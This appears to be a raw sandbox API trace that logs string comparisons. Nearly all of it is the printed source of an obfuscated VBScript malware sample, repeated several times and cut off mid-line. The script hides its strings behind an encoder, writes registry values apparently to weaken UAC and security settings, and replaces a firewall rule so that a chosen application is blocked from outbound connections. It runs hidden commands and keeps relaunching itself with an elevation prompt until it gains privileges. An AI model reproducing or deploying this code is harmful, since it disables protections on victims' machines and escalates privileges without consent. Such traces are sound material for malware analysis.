bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 40 [0226.310] wcsncmp (_String1=")-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.310] wcsncmp (_String1="-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0226.310] wcsncmp (_String1="x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0226.310] wcsncmp (_String1="4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = 